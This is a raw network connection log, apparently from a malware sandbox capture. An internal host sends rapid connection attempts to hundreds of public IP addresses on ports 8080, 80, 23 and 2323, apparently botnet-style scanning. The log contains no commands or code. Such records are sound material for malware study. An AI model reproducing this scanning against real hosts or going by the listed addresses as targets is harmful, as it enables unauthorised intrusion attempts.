                                                              Nov 13, 2023 22:18:00.692157030 CET139488080192.168.2.2331.11.167.54
                                                              Nov 13, 2023 22:18:00.692157984 CET139488080192.168.2.2394.170.30.13
                                                              Nov 13, 2023 22:18:00.692168951 CET139488080192.168.2.2394.2.162.183
                                                              Nov 13, 2023 22:18:00.692168951 CET139488080192.168.2.2394.161.123.216
                                                              Nov 13, 2023 22:18:00.692176104 CET139488080192.168.2.2331.60.224.218
                                                              Nov 13, 2023 22:18:00.692178011 CET139488080192.168.2.2394.13.107.135
                                                              Nov 13, 2023 22:18:00.692193031 CET139488080192.168.2.2362.75.76.90
                                                              Nov 13, 2023 22:18:00.692193985 CET139488080192.168.2.2395.142.146.113
                                                              Nov 13, 2023 22:18:00.692193985 CET139488080192.168.2.2385.178.255.63
                                                              Nov 13, 2023 22:18:00.692193985 CET139488080192.168.2.2394.8.118.13
                                                              Nov 13, 2023 22:18:00.692198038 CET139488080192.168.2.2394.95.60.120
                                                              Nov 13, 2023 22:18:00.692204952 CET139488080192.168.2.2385.239.169.146
                                                              Nov 13, 2023 22:18:00.692213058 CET139488080192.168.2.2395.236.24.110
                                                              Nov 13, 2023 22:18:00.692214966 CET139488080192.168.2.2394.249.168.253
                                                              Nov 13, 2023 22:18:00.692219973 CET139488080192.168.2.2331.191.213.53
                                                              Nov 13, 2023 22:18:00.692220926 CET139488080192.168.2.2331.174.97.146
                                                              Nov 13, 2023 22:18:00.692219973 CET139488080192.168.2.2395.65.213.223
                                                              Nov 13, 2023 22:18:00.692238092 CET139488080192.168.2.2331.92.61.254
                                                              Nov 13, 2023 22:18:00.692238092 CET139488080192.168.2.2385.40.38.190
                                                              Nov 13, 2023 22:18:00.692238092 CET139488080192.168.2.2395.197.195.222
                                                              Nov 13, 2023 22:18:00.692239046 CET139488080192.168.2.2331.60.46.199
                                                              Nov 13, 2023 22:18:00.692264080 CET139488080192.168.2.2394.204.13.190
                                                              Nov 13, 2023 22:18:00.692265034 CET139488080192.168.2.2362.216.71.39
                                                              Nov 13, 2023 22:18:00.692265987 CET139488080192.168.2.2395.228.174.54
                                                              Nov 13, 2023 22:18:00.692265987 CET139488080192.168.2.2331.61.59.216
                                                              Nov 13, 2023 22:18:00.692285061 CET139488080192.168.2.2362.8.119.181
                                                              Nov 13, 2023 22:18:00.692297935 CET426128080192.168.2.2394.120.235.36
                                                              Nov 13, 2023 22:18:00.692306995 CET426128080192.168.2.2394.120.235.36
                                                              Nov 13, 2023 22:18:00.692373037 CET449428080192.168.2.2394.120.12.219
                                                              Nov 13, 2023 22:18:00.692382097 CET449428080192.168.2.2394.120.12.219
                                                              Nov 13, 2023 22:18:00.692394018 CET426168080192.168.2.2394.120.235.36
                                                              Nov 13, 2023 22:18:00.692403078 CET449508080192.168.2.2394.120.12.219
                                                              Nov 13, 2023 22:18:00.696078062 CET80804227662.29.114.4192.168.2.23
                                                              Nov 13, 2023 22:18:00.696139097 CET422768080192.168.2.2362.29.114.4
                                                              Nov 13, 2023 22:18:00.696152925 CET422768080192.168.2.2362.29.114.4
                                                              Nov 13, 2023 22:18:00.696171045 CET422768080192.168.2.2362.29.114.4
                                                              Nov 13, 2023 22:18:00.696186066 CET422888080192.168.2.2362.29.114.4
                                                              Nov 13, 2023 22:18:00.723246098 CET80805907695.174.114.89192.168.2.23
                                                              Nov 13, 2023 22:18:00.723391056 CET590768080192.168.2.2395.174.114.89
                                                              Nov 13, 2023 22:18:00.723391056 CET590768080192.168.2.2395.174.114.89
                                                              Nov 13, 2023 22:18:00.723391056 CET590768080192.168.2.2395.174.114.89
                                                              Nov 13, 2023 22:18:00.723412037 CET590848080192.168.2.2395.174.114.89
                                                              Nov 13, 2023 22:18:00.742198944 CET1343680192.168.2.23112.14.56.92
                                                              Nov 13, 2023 22:18:00.742219925 CET1343680192.168.2.23112.245.47.170
                                                              Nov 13, 2023 22:18:00.742240906 CET1343680192.168.2.23112.47.164.237
                                                              Nov 13, 2023 22:18:00.742289066 CET1343680192.168.2.23112.35.130.152
                                                              Nov 13, 2023 22:18:00.742314100 CET1343680192.168.2.23112.170.34.200
                                                              Nov 13, 2023 22:18:00.742319107 CET1343680192.168.2.23112.103.116.154
                                                              Nov 13, 2023 22:18:00.742317915 CET1343680192.168.2.23112.240.169.182
                                                              Nov 13, 2023 22:18:00.742342949 CET1343680192.168.2.23112.251.165.236
                                                              Nov 13, 2023 22:18:00.742367029 CET1343680192.168.2.23112.174.124.142
                                                              Nov 13, 2023 22:18:00.742394924 CET1343680192.168.2.23112.138.137.235
                                                              Nov 13, 2023 22:18:00.742434025 CET1343680192.168.2.23112.53.209.13
                                                              Nov 13, 2023 22:18:00.742435932 CET1343680192.168.2.23112.249.222.93
                                                              Nov 13, 2023 22:18:00.742455959 CET1343680192.168.2.23112.125.190.166
                                                              Nov 13, 2023 22:18:00.742470026 CET1343680192.168.2.23112.18.150.194
                                                              Nov 13, 2023 22:18:00.742501020 CET1343680192.168.2.23112.12.213.142
                                                              Nov 13, 2023 22:18:00.742513895 CET1343680192.168.2.23112.226.82.182
                                                              Nov 13, 2023 22:18:00.742532969 CET1343680192.168.2.23112.92.224.160
                                                              Nov 13, 2023 22:18:00.742547035 CET1343680192.168.2.23112.153.24.120
                                                              Nov 13, 2023 22:18:00.742573023 CET1343680192.168.2.23112.215.126.234
                                                              Nov 13, 2023 22:18:00.742585897 CET1343680192.168.2.23112.22.255.249
                                                              Nov 13, 2023 22:18:00.742613077 CET1343680192.168.2.23112.147.240.177
                                                              Nov 13, 2023 22:18:00.742630005 CET1343680192.168.2.23112.62.131.17
                                                              Nov 13, 2023 22:18:00.742650032 CET1343680192.168.2.23112.248.233.80
                                                              Nov 13, 2023 22:18:00.742664099 CET1343680192.168.2.23112.249.75.9
                                                              Nov 13, 2023 22:18:00.742680073 CET1343680192.168.2.23112.194.181.203
                                                              Nov 13, 2023 22:18:00.742741108 CET1343680192.168.2.23112.184.220.68
                                                              Nov 13, 2023 22:18:00.742763996 CET1343680192.168.2.23112.41.177.236
                                                              Nov 13, 2023 22:18:00.742763996 CET1343680192.168.2.23112.115.104.44
                                                              Nov 13, 2023 22:18:00.742784023 CET1343680192.168.2.23112.5.2.19
                                                              Nov 13, 2023 22:18:00.742791891 CET1343680192.168.2.23112.249.250.104
                                                              Nov 13, 2023 22:18:00.742810011 CET1343680192.168.2.23112.24.92.44
                                                              Nov 13, 2023 22:18:00.742824078 CET1343680192.168.2.23112.234.76.176
                                                              Nov 13, 2023 22:18:00.742846966 CET1343680192.168.2.23112.242.56.254
                                                              Nov 13, 2023 22:18:00.742881060 CET1343680192.168.2.23112.128.190.108
                                                              Nov 13, 2023 22:18:00.742897034 CET1343680192.168.2.23112.248.116.58
                                                              Nov 13, 2023 22:18:00.742904902 CET1343680192.168.2.23112.28.231.232
                                                              Nov 13, 2023 22:18:00.742944002 CET1343680192.168.2.23112.144.171.143
                                                              Nov 13, 2023 22:18:00.742958069 CET1343680192.168.2.23112.160.94.21
                                                              Nov 13, 2023 22:18:00.742976904 CET1343680192.168.2.23112.126.38.108
                                                              Nov 13, 2023 22:18:00.742995024 CET1343680192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:00.743026972 CET1343680192.168.2.23112.145.164.134
                                                              Nov 13, 2023 22:18:00.743045092 CET1343680192.168.2.23112.216.169.223
                                                              Nov 13, 2023 22:18:00.743060112 CET1343680192.168.2.23112.71.39.36
                                                              Nov 13, 2023 22:18:00.743083000 CET1343680192.168.2.23112.219.119.64
                                                              Nov 13, 2023 22:18:00.743103981 CET1343680192.168.2.23112.130.68.190
                                                              Nov 13, 2023 22:18:00.743120909 CET1343680192.168.2.23112.226.119.219
                                                              Nov 13, 2023 22:18:00.743151903 CET1343680192.168.2.23112.46.98.248
                                                              Nov 13, 2023 22:18:00.743170977 CET1343680192.168.2.23112.235.129.143
                                                              Nov 13, 2023 22:18:00.743185997 CET1343680192.168.2.23112.131.203.189
                                                              Nov 13, 2023 22:18:00.743207932 CET1343680192.168.2.23112.61.130.159
                                                              Nov 13, 2023 22:18:00.743227005 CET1343680192.168.2.23112.50.124.130
                                                              Nov 13, 2023 22:18:00.743243933 CET1343680192.168.2.23112.90.36.219
                                                              Nov 13, 2023 22:18:00.743287086 CET1343680192.168.2.23112.249.102.11
                                                              Nov 13, 2023 22:18:00.743304968 CET1343680192.168.2.23112.57.149.51
                                                              Nov 13, 2023 22:18:00.743326902 CET1343680192.168.2.23112.191.12.177
                                                              Nov 13, 2023 22:18:00.743352890 CET1343680192.168.2.23112.26.139.215
                                                              Nov 13, 2023 22:18:00.743395090 CET1343680192.168.2.23112.105.126.191
                                                              Nov 13, 2023 22:18:00.743410110 CET1343680192.168.2.23112.36.242.36
                                                              Nov 13, 2023 22:18:00.743439913 CET1343680192.168.2.23112.234.158.126
                                                              Nov 13, 2023 22:18:00.743458986 CET1343680192.168.2.23112.138.37.214
                                                              Nov 13, 2023 22:18:00.743493080 CET1343680192.168.2.23112.39.218.122
                                                              Nov 13, 2023 22:18:00.743505001 CET1343680192.168.2.23112.165.49.146
                                                              Nov 13, 2023 22:18:00.743522882 CET1343680192.168.2.23112.176.44.233
                                                              Nov 13, 2023 22:18:00.743545055 CET1343680192.168.2.23112.156.180.7
                                                              Nov 13, 2023 22:18:00.743581057 CET1343680192.168.2.23112.69.192.52
                                                              Nov 13, 2023 22:18:00.743599892 CET1343680192.168.2.23112.138.170.141
                                                              Nov 13, 2023 22:18:00.743617058 CET1343680192.168.2.23112.139.211.186
                                                              Nov 13, 2023 22:18:00.743639946 CET1343680192.168.2.23112.45.60.224
                                                              Nov 13, 2023 22:18:00.743658066 CET1343680192.168.2.23112.177.199.7
                                                              Nov 13, 2023 22:18:00.743690014 CET1343680192.168.2.23112.60.155.241
                                                              Nov 13, 2023 22:18:00.743694067 CET1343680192.168.2.23112.130.93.179
                                                              Nov 13, 2023 22:18:00.743707895 CET1343680192.168.2.23112.55.27.23
                                                              Nov 13, 2023 22:18:00.743722916 CET1343680192.168.2.23112.127.135.149
                                                              Nov 13, 2023 22:18:00.743742943 CET1343680192.168.2.23112.210.32.56
                                                              Nov 13, 2023 22:18:00.743762970 CET1343680192.168.2.23112.62.77.227
                                                              Nov 13, 2023 22:18:00.743820906 CET1343680192.168.2.23112.124.210.26
                                                              Nov 13, 2023 22:18:00.743825912 CET1343680192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:00.743850946 CET1343680192.168.2.23112.151.109.113
                                                              Nov 13, 2023 22:18:00.743866920 CET1343680192.168.2.23112.99.57.86
                                                              Nov 13, 2023 22:18:00.743896961 CET1343680192.168.2.23112.149.188.188
                                                              Nov 13, 2023 22:18:00.743927956 CET1343680192.168.2.23112.140.101.117
                                                              Nov 13, 2023 22:18:00.743946075 CET1343680192.168.2.23112.113.9.24
                                                              Nov 13, 2023 22:18:00.743972063 CET1343680192.168.2.23112.10.136.23
                                                              Nov 13, 2023 22:18:00.743993044 CET1343680192.168.2.23112.108.239.117
                                                              Nov 13, 2023 22:18:00.744023085 CET1343680192.168.2.23112.137.202.61
                                                              Nov 13, 2023 22:18:00.744044065 CET1343680192.168.2.23112.246.37.166
                                                              Nov 13, 2023 22:18:00.744070053 CET1343680192.168.2.23112.101.10.52
                                                              Nov 13, 2023 22:18:00.744088888 CET1343680192.168.2.23112.31.145.201
                                                              Nov 13, 2023 22:18:00.744102955 CET1343680192.168.2.23112.199.132.235
                                                              Nov 13, 2023 22:18:00.744119883 CET1343680192.168.2.23112.30.178.138
                                                              Nov 13, 2023 22:18:00.744138956 CET1343680192.168.2.23112.107.141.238
                                                              Nov 13, 2023 22:18:00.744172096 CET1343680192.168.2.23112.71.7.45
                                                              Nov 13, 2023 22:18:00.744194984 CET1343680192.168.2.23112.27.246.116
                                                              Nov 13, 2023 22:18:00.744223118 CET1343680192.168.2.23112.241.254.170
                                                              Nov 13, 2023 22:18:00.744236946 CET1343680192.168.2.23112.164.33.227
                                                              Nov 13, 2023 22:18:00.744259119 CET1343680192.168.2.23112.113.88.102
                                                              Nov 13, 2023 22:18:00.744278908 CET1343680192.168.2.23112.101.179.118
                                                              Nov 13, 2023 22:18:00.744288921 CET1343680192.168.2.23112.62.83.148
                                                              Nov 13, 2023 22:18:00.744304895 CET1343680192.168.2.23112.210.186.225
                                                              Nov 13, 2023 22:18:00.744327068 CET1343680192.168.2.23112.183.220.140
                                                              Nov 13, 2023 22:18:00.744343042 CET1343680192.168.2.23112.166.205.179
                                                              Nov 13, 2023 22:18:00.744359016 CET1343680192.168.2.23112.103.178.194
                                                              Nov 13, 2023 22:18:00.744374990 CET1343680192.168.2.23112.159.53.21
                                                              Nov 13, 2023 22:18:00.744394064 CET1343680192.168.2.23112.112.201.10
                                                              Nov 13, 2023 22:18:00.744410038 CET1343680192.168.2.23112.33.120.199
                                                              Nov 13, 2023 22:18:00.744437933 CET1343680192.168.2.23112.26.168.86
                                                              Nov 13, 2023 22:18:00.744457006 CET1343680192.168.2.23112.19.31.236
                                                              Nov 13, 2023 22:18:00.744482994 CET1343680192.168.2.23112.33.189.248
                                                              Nov 13, 2023 22:18:00.744502068 CET1343680192.168.2.23112.23.151.145
                                                              Nov 13, 2023 22:18:00.744524956 CET1343680192.168.2.23112.126.107.183
                                                              Nov 13, 2023 22:18:00.744544983 CET1343680192.168.2.23112.153.201.52
                                                              Nov 13, 2023 22:18:00.744558096 CET1343680192.168.2.23112.123.95.27
                                                              Nov 13, 2023 22:18:00.744577885 CET1343680192.168.2.23112.229.220.1
                                                              Nov 13, 2023 22:18:00.744600058 CET1343680192.168.2.23112.76.164.101
                                                              Nov 13, 2023 22:18:00.744632959 CET1343680192.168.2.23112.160.202.53
                                                              Nov 13, 2023 22:18:00.744657993 CET1343680192.168.2.23112.91.148.247
                                                              Nov 13, 2023 22:18:00.744658947 CET1343680192.168.2.23112.160.112.112
                                                              Nov 13, 2023 22:18:00.744663954 CET1343680192.168.2.23112.173.24.60
                                                              Nov 13, 2023 22:18:00.744684935 CET1343680192.168.2.23112.162.67.134
                                                              Nov 13, 2023 22:18:00.744704008 CET1343680192.168.2.23112.220.211.160
                                                              Nov 13, 2023 22:18:00.744729996 CET1343680192.168.2.23112.120.57.245
                                                              Nov 13, 2023 22:18:00.744749069 CET1343680192.168.2.23112.247.195.144
                                                              Nov 13, 2023 22:18:00.744767904 CET1343680192.168.2.23112.68.250.58
                                                              Nov 13, 2023 22:18:00.744788885 CET1343680192.168.2.23112.183.221.245
                                                              Nov 13, 2023 22:18:00.744815111 CET1343680192.168.2.23112.6.43.223
                                                              Nov 13, 2023 22:18:00.744836092 CET1343680192.168.2.23112.13.56.203
                                                              Nov 13, 2023 22:18:00.744863987 CET1343680192.168.2.23112.98.198.91
                                                              Nov 13, 2023 22:18:00.744880915 CET1343680192.168.2.23112.221.164.220
                                                              Nov 13, 2023 22:18:00.744899988 CET1343680192.168.2.23112.247.135.127
                                                              Nov 13, 2023 22:18:00.744918108 CET1343680192.168.2.23112.23.181.43
                                                              Nov 13, 2023 22:18:00.744946003 CET1343680192.168.2.23112.81.137.101
                                                              Nov 13, 2023 22:18:00.744962931 CET1343680192.168.2.23112.97.5.218
                                                              Nov 13, 2023 22:18:00.744982004 CET1343680192.168.2.23112.196.209.89
                                                              Nov 13, 2023 22:18:00.745028019 CET1343680192.168.2.23112.83.192.16
                                                              Nov 13, 2023 22:18:00.745043993 CET1343680192.168.2.23112.157.169.134
                                                              Nov 13, 2023 22:18:00.745055914 CET1343680192.168.2.23112.252.185.198
                                                              Nov 13, 2023 22:18:00.745088100 CET1343680192.168.2.23112.91.220.237
                                                              Nov 13, 2023 22:18:00.745109081 CET1343680192.168.2.23112.238.252.163
                                                              Nov 13, 2023 22:18:00.745122910 CET1343680192.168.2.23112.33.38.110
                                                              Nov 13, 2023 22:18:00.745146036 CET1343680192.168.2.23112.78.248.170
                                                              Nov 13, 2023 22:18:00.745165110 CET1343680192.168.2.23112.111.61.236
                                                              Nov 13, 2023 22:18:00.745181084 CET1343680192.168.2.23112.101.139.226
                                                              Nov 13, 2023 22:18:00.745203972 CET1343680192.168.2.23112.190.39.22
                                                              Nov 13, 2023 22:18:00.745215893 CET1343680192.168.2.23112.25.81.82
                                                              Nov 13, 2023 22:18:00.745248079 CET1343680192.168.2.23112.42.44.227
                                                              Nov 13, 2023 22:18:00.745256901 CET1343680192.168.2.23112.145.174.137
                                                              Nov 13, 2023 22:18:00.745285034 CET1343680192.168.2.23112.125.221.109
                                                              Nov 13, 2023 22:18:00.745307922 CET1343680192.168.2.23112.86.248.41
                                                              Nov 13, 2023 22:18:00.745326042 CET1343680192.168.2.23112.125.160.163
                                                              Nov 13, 2023 22:18:00.745342970 CET1343680192.168.2.23112.201.233.78
                                                              Nov 13, 2023 22:18:00.745356083 CET1343680192.168.2.23112.103.224.57
                                                              Nov 13, 2023 22:18:00.745383024 CET1343680192.168.2.23112.181.248.40
                                                              Nov 13, 2023 22:18:00.745399952 CET1343680192.168.2.23112.32.42.252
                                                              Nov 13, 2023 22:18:00.745445013 CET1343680192.168.2.23112.189.67.54
                                                              Nov 13, 2023 22:18:00.745459080 CET1343680192.168.2.23112.235.231.94
                                                              Nov 13, 2023 22:18:00.745471954 CET1343680192.168.2.23112.133.253.144
                                                              Nov 13, 2023 22:18:00.745501995 CET1343680192.168.2.23112.210.20.107
                                                              Nov 13, 2023 22:18:00.745543003 CET1343680192.168.2.23112.25.111.52
                                                              Nov 13, 2023 22:18:00.745547056 CET1343680192.168.2.23112.17.88.10
                                                              Nov 13, 2023 22:18:00.745559931 CET1343680192.168.2.23112.2.202.18
                                                              Nov 13, 2023 22:18:00.745718002 CET4500680192.168.2.2388.99.231.68
                                                              Nov 13, 2023 22:18:00.757520914 CET5645680192.168.2.2388.218.105.5
                                                              Nov 13, 2023 22:18:00.771408081 CET1138823192.168.2.23132.78.3.148
                                                              Nov 13, 2023 22:18:00.771409988 CET113882323192.168.2.23179.121.2.102
                                                              Nov 13, 2023 22:18:00.771419048 CET1138823192.168.2.2397.132.150.137
                                                              Nov 13, 2023 22:18:00.771423101 CET1138823192.168.2.2317.226.139.195
                                                              Nov 13, 2023 22:18:00.771423101 CET1138823192.168.2.23103.171.98.215
                                                              Nov 13, 2023 22:18:00.771423101 CET113882323192.168.2.23218.36.70.116
                                                              Nov 13, 2023 22:18:00.771425009 CET1138823192.168.2.2323.6.236.153
                                                              Nov 13, 2023 22:18:00.771425009 CET1138823192.168.2.23194.211.3.74
                                                              Nov 13, 2023 22:18:00.771431923 CET1138823192.168.2.23129.209.213.31
                                                              Nov 13, 2023 22:18:00.771433115 CET1138823192.168.2.23218.62.38.151
                                                              Nov 13, 2023 22:18:00.771449089 CET1138823192.168.2.23220.99.5.45
                                                              Nov 13, 2023 22:18:00.771449089 CET1138823192.168.2.23208.224.6.24
                                                              Nov 13, 2023 22:18:00.771450043 CET1138823192.168.2.23111.104.113.15
                                                              Nov 13, 2023 22:18:00.771456957 CET1138823192.168.2.23146.217.172.0
                                                              Nov 13, 2023 22:18:00.771456957 CET1138823192.168.2.2349.135.189.205
                                                              Nov 13, 2023 22:18:00.771476984 CET1138823192.168.2.2320.139.230.70
                                                              Nov 13, 2023 22:18:00.771481037 CET113882323192.168.2.23201.53.201.8
                                                              Nov 13, 2023 22:18:00.771492004 CET1138823192.168.2.2346.221.36.75
                                                              Nov 13, 2023 22:18:00.771492004 CET1138823192.168.2.23131.90.249.194
                                                              Nov 13, 2023 22:18:00.771492004 CET1138823192.168.2.2347.129.112.50
                                                              Nov 13, 2023 22:18:00.771496058 CET1138823192.168.2.23141.236.177.21
                                                              Nov 13, 2023 22:18:00.771509886 CET1138823192.168.2.2380.144.64.100
                                                              Nov 13, 2023 22:18:00.771512032 CET1138823192.168.2.23136.222.180.50
                                                              Nov 13, 2023 22:18:00.771512032 CET1138823192.168.2.23195.63.15.157
                                                              Nov 13, 2023 22:18:00.771512032 CET1138823192.168.2.2319.109.218.17
                                                              Nov 13, 2023 22:18:00.771512032 CET1138823192.168.2.2363.157.234.51
                                                              Nov 13, 2023 22:18:00.771512032 CET1138823192.168.2.23115.86.86.237
                                                              Nov 13, 2023 22:18:00.771514893 CET1138823192.168.2.23190.215.234.3
                                                              Nov 13, 2023 22:18:00.771514893 CET1138823192.168.2.23123.141.163.192
                                                              Nov 13, 2023 22:18:00.771531105 CET1138823192.168.2.2378.13.120.134
                                                              Nov 13, 2023 22:18:00.771531105 CET113882323192.168.2.238.116.58.180
                                                              Nov 13, 2023 22:18:00.771550894 CET1138823192.168.2.2383.73.195.185
                                                              Nov 13, 2023 22:18:00.771553993 CET1138823192.168.2.23157.118.140.92
                                                              Nov 13, 2023 22:18:00.771554947 CET1138823192.168.2.2382.23.46.193
                                                              Nov 13, 2023 22:18:00.771559000 CET1138823192.168.2.2353.76.84.214
                                                              Nov 13, 2023 22:18:00.771559000 CET1138823192.168.2.23165.200.180.188
                                                              Nov 13, 2023 22:18:00.771560907 CET1138823192.168.2.23130.0.155.79
                                                              Nov 13, 2023 22:18:00.771564960 CET1138823192.168.2.2352.181.241.190
                                                              Nov 13, 2023 22:18:00.771565914 CET1138823192.168.2.2343.192.172.15
                                                              Nov 13, 2023 22:18:00.771565914 CET1138823192.168.2.2325.6.42.227
                                                              Nov 13, 2023 22:18:00.771569014 CET113882323192.168.2.2332.49.245.62
                                                              Nov 13, 2023 22:18:00.771570921 CET1138823192.168.2.23184.57.38.63
                                                              Nov 13, 2023 22:18:00.771585941 CET1138823192.168.2.23133.206.234.82
                                                              Nov 13, 2023 22:18:00.771585941 CET1138823192.168.2.23201.211.57.255
                                                              Nov 13, 2023 22:18:00.771591902 CET1138823192.168.2.23153.135.37.170
                                                              Nov 13, 2023 22:18:00.771591902 CET1138823192.168.2.2327.3.92.236
                                                              Nov 13, 2023 22:18:00.771595955 CET1138823192.168.2.23128.148.36.140
                                                              Nov 13, 2023 22:18:00.771596909 CET1138823192.168.2.23152.83.13.12
                                                              Nov 13, 2023 22:18:00.771612883 CET1138823192.168.2.23200.53.82.112
                                                              Nov 13, 2023 22:18:00.771620989 CET1138823192.168.2.23122.80.9.49
                                                              Nov 13, 2023 22:18:00.771625042 CET113882323192.168.2.23154.184.77.84
                                                              Nov 13, 2023 22:18:00.771625042 CET1138823192.168.2.23144.116.130.117
                                                              Nov 13, 2023 22:18:00.771636009 CET1138823192.168.2.23184.159.175.58
                                                              Nov 13, 2023 22:18:00.771645069 CET1138823192.168.2.23126.68.246.119
                                                              Nov 13, 2023 22:18:00.771645069 CET1138823192.168.2.23122.243.70.241
                                                              Nov 13, 2023 22:18:00.771646976 CET1138823192.168.2.235.110.234.23
                                                              Nov 13, 2023 22:18:00.771660089 CET1138823192.168.2.23132.142.244.201
                                                              Nov 13, 2023 22:18:00.771662951 CET1138823192.168.2.23102.108.164.245
                                                              Nov 13, 2023 22:18:00.771662951 CET1138823192.168.2.2312.26.247.1
                                                              Nov 13, 2023 22:18:00.771666050 CET1138823192.168.2.2379.49.200.179
                                                              Nov 13, 2023 22:18:00.771676064 CET113882323192.168.2.2397.115.114.24
                                                              Nov 13, 2023 22:18:00.771677017 CET1138823192.168.2.2398.125.66.135
                                                              Nov 13, 2023 22:18:00.771678925 CET1138823192.168.2.23109.193.55.66
                                                              Nov 13, 2023 22:18:00.771687984 CET1138823192.168.2.2364.217.205.237
                                                              Nov 13, 2023 22:18:00.771689892 CET1138823192.168.2.239.14.105.112
                                                              Nov 13, 2023 22:18:00.771699905 CET1138823192.168.2.23211.21.193.159
                                                              Nov 13, 2023 22:18:00.771706104 CET1138823192.168.2.2364.211.115.215
                                                              Nov 13, 2023 22:18:00.771713018 CET1138823192.168.2.2340.24.175.135
                                                              Nov 13, 2023 22:18:00.771713018 CET1138823192.168.2.23125.23.67.221
                                                              Nov 13, 2023 22:18:00.771728992 CET1138823192.168.2.23163.96.123.227
                                                              Nov 13, 2023 22:18:00.771732092 CET1138823192.168.2.23135.42.255.140
                                                              Nov 13, 2023 22:18:00.771732092 CET113882323192.168.2.23130.20.13.149
                                                              Nov 13, 2023 22:18:00.771749020 CET1138823192.168.2.2320.131.58.140
                                                              Nov 13, 2023 22:18:00.771759987 CET1138823192.168.2.23204.18.27.113
                                                              Nov 13, 2023 22:18:00.771759987 CET1138823192.168.2.23170.214.22.68
                                                              Nov 13, 2023 22:18:00.771763086 CET1138823192.168.2.23176.198.132.120
                                                              Nov 13, 2023 22:18:00.771771908 CET1138823192.168.2.23188.45.14.20
                                                              Nov 13, 2023 22:18:00.771771908 CET113882323192.168.2.23158.227.63.142
                                                              Nov 13, 2023 22:18:00.771779060 CET1138823192.168.2.23111.93.31.59
                                                              Nov 13, 2023 22:18:00.771779060 CET1138823192.168.2.23132.57.93.56
                                                              Nov 13, 2023 22:18:00.771779060 CET1138823192.168.2.23121.80.26.250
                                                              Nov 13, 2023 22:18:00.771779060 CET1138823192.168.2.2337.27.140.133
                                                              Nov 13, 2023 22:18:00.771784067 CET1138823192.168.2.2366.30.34.67
                                                              Nov 13, 2023 22:18:00.771797895 CET1138823192.168.2.23202.83.90.19
                                                              Nov 13, 2023 22:18:00.771797895 CET1138823192.168.2.2325.129.209.107
                                                              Nov 13, 2023 22:18:00.771800995 CET1138823192.168.2.23107.43.77.38
                                                              Nov 13, 2023 22:18:00.771805048 CET1138823192.168.2.2387.143.94.243
                                                              Nov 13, 2023 22:18:00.771825075 CET1138823192.168.2.23126.220.196.12
                                                              Nov 13, 2023 22:18:00.771825075 CET113882323192.168.2.23171.27.234.176
                                                              Nov 13, 2023 22:18:00.771826982 CET1138823192.168.2.2370.150.237.103
                                                              Nov 13, 2023 22:18:00.771837950 CET1138823192.168.2.2385.80.130.159
                                                              Nov 13, 2023 22:18:00.771872997 CET1138823192.168.2.2395.83.151.134
                                                              Nov 13, 2023 22:18:00.771872997 CET1138823192.168.2.23134.62.69.20
                                                              Nov 13, 2023 22:18:00.771872997 CET1138823192.168.2.23166.122.184.173
                                                              Nov 13, 2023 22:18:00.771878004 CET1138823192.168.2.23101.32.61.96
                                                              Nov 13, 2023 22:18:00.771878004 CET1138823192.168.2.2351.40.23.124
                                                              Nov 13, 2023 22:18:00.771878958 CET1138823192.168.2.23103.97.111.210
                                                              Nov 13, 2023 22:18:00.771878004 CET1138823192.168.2.2317.11.23.31
                                                              Nov 13, 2023 22:18:00.771878958 CET1138823192.168.2.23172.100.8.151
                                                              Nov 13, 2023 22:18:00.771878958 CET1138823192.168.2.23174.126.110.130
                                                              Nov 13, 2023 22:18:00.771878004 CET1138823192.168.2.23175.130.15.21
                                                              Nov 13, 2023 22:18:00.771878958 CET1138823192.168.2.23223.10.224.246
                                                              Nov 13, 2023 22:18:00.771878958 CET113882323192.168.2.23202.231.159.33
                                                              Nov 13, 2023 22:18:00.771878958 CET1138823192.168.2.2369.97.163.215
                                                              Nov 13, 2023 22:18:00.771878958 CET1138823192.168.2.23163.209.167.160
                                                              Nov 13, 2023 22:18:00.771886110 CET1138823192.168.2.23140.133.193.20
                                                              Nov 13, 2023 22:18:00.771887064 CET1138823192.168.2.23204.10.44.120
                                                              Nov 13, 2023 22:18:00.771902084 CET1138823192.168.2.23151.218.197.138
                                                              Nov 13, 2023 22:18:00.771902084 CET113882323192.168.2.2324.234.186.169
                                                              Nov 13, 2023 22:18:00.771903992 CET1138823192.168.2.2348.21.132.150
                                                              Nov 13, 2023 22:18:00.771904945 CET1138823192.168.2.23165.110.192.151
                                                              Nov 13, 2023 22:18:00.771912098 CET1138823192.168.2.23167.9.9.166
                                                              Nov 13, 2023 22:18:00.771912098 CET1138823192.168.2.23142.121.65.212
                                                              Nov 13, 2023 22:18:00.771923065 CET1138823192.168.2.2336.4.227.47
                                                              Nov 13, 2023 22:18:00.771925926 CET1138823192.168.2.2347.174.4.247
                                                              Nov 13, 2023 22:18:00.771929026 CET1138823192.168.2.2384.237.126.74
                                                              Nov 13, 2023 22:18:00.771935940 CET1138823192.168.2.23103.148.75.153
                                                              Nov 13, 2023 22:18:00.771951914 CET1138823192.168.2.23193.80.207.118
                                                              Nov 13, 2023 22:18:00.771951914 CET1138823192.168.2.2398.102.125.129
                                                              Nov 13, 2023 22:18:00.771954060 CET1138823192.168.2.2359.213.123.147
                                                              Nov 13, 2023 22:18:00.771960020 CET113882323192.168.2.23170.246.130.183
                                                              Nov 13, 2023 22:18:00.771962881 CET1138823192.168.2.2323.229.98.24
                                                              Nov 13, 2023 22:18:00.771962881 CET1138823192.168.2.23196.210.9.216
                                                              Nov 13, 2023 22:18:00.771977901 CET1138823192.168.2.23139.185.81.80
                                                              Nov 13, 2023 22:18:00.771977901 CET1138823192.168.2.2362.208.77.255
                                                              Nov 13, 2023 22:18:00.771981001 CET1138823192.168.2.2314.203.91.46
                                                              Nov 13, 2023 22:18:00.771989107 CET1138823192.168.2.239.192.54.227
                                                              Nov 13, 2023 22:18:00.771987915 CET1138823192.168.2.23149.238.117.252
                                                              Nov 13, 2023 22:18:00.771994114 CET1138823192.168.2.2361.0.29.54
                                                              Nov 13, 2023 22:18:00.771994114 CET1138823192.168.2.2395.6.239.75
                                                              Nov 13, 2023 22:18:00.772011995 CET1138823192.168.2.2353.8.53.154
                                                              Nov 13, 2023 22:18:00.772012949 CET1138823192.168.2.23108.240.67.35
                                                              Nov 13, 2023 22:18:00.772013903 CET113882323192.168.2.2353.153.253.91
                                                              Nov 13, 2023 22:18:00.772017956 CET1138823192.168.2.23100.166.110.190
                                                              Nov 13, 2023 22:18:00.772018909 CET1138823192.168.2.2362.88.171.186
                                                              Nov 13, 2023 22:18:00.772031069 CET1138823192.168.2.23141.213.126.224
                                                              Nov 13, 2023 22:18:00.772032022 CET1138823192.168.2.23216.205.73.155
